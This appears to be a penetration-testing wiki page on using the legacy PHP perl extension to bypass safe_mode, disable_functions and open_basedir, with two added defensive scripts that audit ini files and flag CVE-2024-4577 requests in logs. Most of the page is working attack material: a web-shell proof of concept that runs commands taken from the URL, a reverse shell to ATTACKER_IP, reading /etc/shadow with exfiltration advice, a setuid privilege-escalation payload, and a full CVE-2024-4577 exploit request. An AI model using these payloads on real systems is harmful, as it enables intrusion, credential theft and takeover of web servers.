PHP Perl Extension Safe_mode Bypass Exploit

Context

The issue tracked as CVE-2007-4596 comes from the legacy perl PHP extension, which embeds a full Perl interpreter without honoring PHP’s safe_mode, disable_functions, or open_basedir controls. Any PHP worker that loads extension=perl.so gains unrestricted Perl eval, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although safe_mode disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.

Compatibility and Packaging Status (2025)

  • The last PECL release (perl-1.0.1, 2013) targets PHP ≥5.0; PHP 8+ generally fails because the Zend APIs changed.
  • PECL is being superseded by PIE, but older stacks still ship PECL/pear. Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).

Building a Test Environment in 2025

  • Fetch perl-1.0.1 from PECL, compile it for the PHP branch you plan to attack, and load it globally (php.ini) or via dl() (if permitted).
  • Quick Debian lab recipe:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • During exploitation confirm availability with var_dump(extension_loaded('perl')); or print_r(get_loaded_extensions());. If absent, search for perl.so or abuse writable php.ini/.user.ini entries to force-load it.
  • Because the interpreter lives inside the PHP worker, no external binaries are needed—network egress filters or proc_open blacklists do not matter.

On-host build chain if phpize is available

If phpize and build-essential are present on the compromised host, you can compile and drop perl.so without shelling out to the OS:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

If open_basedir is enforced, make sure the .user.ini and the dropped .so live in an allowed path; the extension= directive is still honoured inside the basedir. The compile flow follows the PHP manual's guidance for building PECL extensions.
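The test-environment bullets and the on-host build chain both end with the extension being declared in an ini file (php.ini, mods-available/perl.ini or a .user.ini). The audit script below is an added example, not code from the original page or from the PECL perl project: it parses php.ini-style text, reports any extension= line that loads perl, and lists the sandbox directives (safe_mode, disable_functions, open_basedir) configured beside it, since the page's point is that none of them constrain the embedded interpreter. The three ini samples are constructed for the example and only mirror the recipe above.

```python
"""Audit php.ini-style configuration for the legacy perl extension.

Added example (not from the original page or the PECL perl project).
Scans ini text of the kind found in php.ini, mods-available/*.ini and a
dropped .user.ini for an `extension=` line that loads perl, and reports
which PHP sandbox directives sit next to it, since safe_mode,
disable_functions and open_basedir do not constrain code run through
perl->eval().
"""
import re

# Sandbox directives that perl.so ignores once it is loaded.
SANDBOX_DIRECTIVES = ("safe_mode", "disable_functions", "open_basedir")

# key = value   (comments after ';' are stripped before matching)
DIRECTIVE_RE = re.compile(r"^(?P<key>[A-Za-z0-9_.]+)\s*=\s*(?P<value>.*)$")

# Constructed samples; they mirror the page's build recipe, not a real host.
SAMPLE_PHP_INI = """\
; constructed: legacy shared-hosting php.ini
safe_mode = On
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
open_basedir = "/var/www/html:/tmp"
extension=mysqli.so
extension = "perl.so"   ; legacy PECL extension
"""

SAMPLE_USER_INI = """\
; constructed: .user.ini dropped in a webroot
extension=/tmp/perl.so
"""

SAMPLE_CLEAN_INI = """\
disable_functions = exec,system
extension=mysqli.so
"""


def parse_ini(text):
    """Yield (line_no, key, value) for each directive; sections and comments are skipped."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith(("[", "#")):
            continue
        m = DIRECTIVE_RE.match(line)
        if m:
            yield no, m.group("key").lower(), m.group("value").strip().strip('"')


def is_perl_extension(path):
    """True for perl.so, /tmp/perl.so, php_perl.dll or a bare 'perl' (PHP >= 7.2 form)."""
    name = re.split(r"[/\\]", path)[-1].lower()
    name = re.sub(r"\.(so|dll)$", "", name)
    return name in ("perl", "php_perl")


def audit_ini(text, source="php.ini"):
    """Return perl extension hits, the sandbox directives seen, and readable findings."""
    perl_hits, sandbox = [], {}
    for no, key, value in parse_ini(text):
        if key in ("extension", "zend_extension") and is_perl_extension(value):
            perl_hits.append((no, value))
        elif key in SANDBOX_DIRECTIVES:
            sandbox[key] = value
    findings = [f"{source}:{no}: perl extension loaded from {path!r}; "
                "PHP-level sandboxing does not apply to code run through perl->eval()"
                for no, path in perl_hits]
    if perl_hits:
        for key in SANDBOX_DIRECTIVES:
            value = sandbox.get(key, "")
            if value and value.lower() not in ("off", "0", "false", "no", "none"):
                findings.append(f"{source}: {key}={value!r} is set but does not "
                                "constrain the embedded Perl interpreter")
    return {"perl_hits": perl_hits, "sandbox": sandbox, "findings": findings}


if __name__ == "__main__":
    for src, text in (("php.ini", SAMPLE_PHP_INI), (".user.ini", SAMPLE_USER_INI),
                      ("clean.ini", SAMPLE_CLEAN_INI)):
        report = audit_ini(text, src)
        print(f"{src}: {len(report['findings'])} finding(s)")
        for line in report["findings"]:
            print("  -", line)
```

Run it over every ini location PHP reads on the host (php --ini lists them) plus any .user.ini found under the document root; a hit in a .user.ini is worth a look on its own, since the page shows that file as the drop point when the main php.ini is read-only.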

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still useful for confirming that the extension responds to eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Modern Payload Improvements

1. Full TTY over TCP

The embedded interpreter can load IO::Socket even when /usr/bin/perl is blocked:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape Even with open_basedir

Perl does not honour PHP's open_basedir, so any file can be read:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Pipe the output through IO::Socket::INET or Net::HTTP to exfiltrate data without touching any PHP-managed stream wrappers.

3. Inline Compilation for Privilege Escalation

If Inline::C is available system-wide, build helpers inside the request without depending on PHP's ffi or pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Treat Perl as a LOLBAS-style toolkit; for example, dump MySQL DSNs even when mysqli is absent:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Abuse: Loading perl.so via PHP-CGI Argument Injection (CVE-2024-4577)

On Windows installs that still expose PHP-CGI, the 2024 argument-injection regression (CVE-2024-4577) lets arbitrary -d options be passed to the interpreter. This means the Perl extension can be loaded even when dl() is disabled and php.ini is read-only:

  • Build or upload a matching perl.dll/perl.so to a web-writable path (e.g., C:\xampp\htdocs\temp\perl.dll).
  • Send a single HTTP request that injects -d extension=C:\\xampp\\htdocs\\temp\\perl.dll and, in the same request body, the Perl payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Because the PHP worker now embeds Perl before reading the request body, all the usual disable_functions/open_basedir controls are bypassed. This works on vulnerable Windows/CGI stacks until they are patched (PHP 8.1.29/8.2.20/8.3.8 and later fix the issue). If open_basedir blocks the DLL path, place the file inside an allowed base directory first, or use a world-readable DLL path shipped with XAMPP.
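The request shown above is also what a defender has to recognise in web server logs: the payload itself travels in the body and never reaches the access log, so the query string is the detection point. The detector below is an added example, not code from the original page. It splits the query string the way php-cgi receives argv (on +), percent-decodes to raw bytes so the %AD soft hyphen survives as 0xAD, and reports injected options, rating a -d that sets extension=, zend_extension= or auto_prepend_file= as critical. The Apache-style log lines are constructed; the second reproduces the request line from the page.

```python
"""Flag PHP-CGI argument-injection attempts (CVE-2024-4577) in access logs.

Added example, not from the original page. Inspects the request line of
Apache-style access log entries (constructed below) and reports requests
whose query string smuggles php-cgi options via a leading '-' or the
soft-hyphen byte 0xAD (%AD), with special attention to -d directives that
load an extension or prepend php://input.
"""
import re
from urllib.parse import unquote_to_bytes

# Common/combined log format: only method, target and status are needed here.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# An argv token that php-cgi would read as an option: '-x' or soft-hyphen + 'x'.
OPTION_RE = re.compile(rb"^(?:\xad|-)(?P<opt>[a-zA-Z])")

# Directives whose injection turns the bug into code or extension loading.
HIGH_RISK_DIRECTIVES = ("extension", "zend_extension", "auto_prepend_file",
                        "auto_append_file", "allow_url_include")

# Constructed log lines; line 2 mirrors the request shown on the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jun/2024:12:00:02 +0000] "POST /?%ADd+extension=C:\\\\xampp\\\\htdocs'
    '\\\\temp\\\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 88',
    '203.0.113.9 - - [10/Jun/2024:12:00:03 +0000] "GET /?%2Dd+display_errors%3d1 HTTP/1.1" 200 4096',
    '198.51.100.4 - - [10/Jun/2024:12:00:04 +0000] "GET /search.php?q=hello+world HTTP/1.1" 200 300',
]


def _query_tokens(target):
    """Split the query string as php-cgi sees argv: '+' separates arguments and
    percent-escapes decode to raw bytes, so %AD stays the 0xAD soft hyphen."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    return [unquote_to_bytes(part) for part in query.split("+") if part]


def analyze_target(target):
    """Return [(option_letter, directive, value)] for every injected option.
    A -d value may be attached (-dfoo=bar) or in the following token (-d foo=bar)."""
    tokens = _query_tokens(target)
    hits = []
    for i, tok in enumerate(tokens):
        m = OPTION_RE.match(tok)
        if not m:
            continue
        opt = m.group("opt").decode()
        rest = tok[m.end():]
        if not rest and i + 1 < len(tokens):
            rest = tokens[i + 1]
        directive, _, value = rest.decode("latin-1").partition("=")
        hits.append((opt, directive.strip(), value.strip()))
    return hits


def classify(hits):
    """'critical' when a -d loads an extension or prepends a file, 'suspicious'
    for any other injected option, None when nothing was injected."""
    if not hits:
        return None
    for opt, directive, _ in hits:
        if opt == "d" and directive.lower() in HIGH_RISK_DIRECTIVES:
            return "critical"
    return "suspicious"


def scan_log(lines):
    """Return [(line_no, severity, hits)] for log lines carrying injected options."""
    results = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = analyze_target(m.group("target"))
        severity = classify(hits)
        if severity:
            results.append((no, severity, hits))
    return results


if __name__ == "__main__":
    for no, severity, hits in scan_log(SAMPLE_LOG):
        print(f"line {no}: {severity}")
        for opt, directive, value in hits:
            print(f"   -{opt} {directive}={value}")
```

Only the request line is examined, so a hit tells you that an option was injected, not what the prepended body did; the follow-up is the PHP error log and the fixed releases the page lists (8.1.29/8.2.20/8.3.8), or moving the affected hosts off the CGI handler.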
